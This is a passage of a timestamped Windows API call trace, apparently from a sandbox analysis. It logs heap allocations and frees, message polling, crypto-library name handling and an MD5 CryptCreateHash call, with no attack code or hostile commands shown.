lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0152.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0152.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0152.421] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0152.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0152.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0152.422] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0152.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0152.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0152.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0152.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0152.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0152.423] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0152.423] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0152.423] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0152.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0152.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0152.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0152.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0152.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0152.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0152.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0152.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0152.426] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0152.426] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.426] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0152.426] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0152.426] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.426] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0152.426] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0152.426] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.426] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.426] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0152.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.427] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.427] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0152.427] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0152.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0152.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.428] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0152.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0152.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0152.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0152.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0152.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0152.429] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0152.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0152.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0152.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: 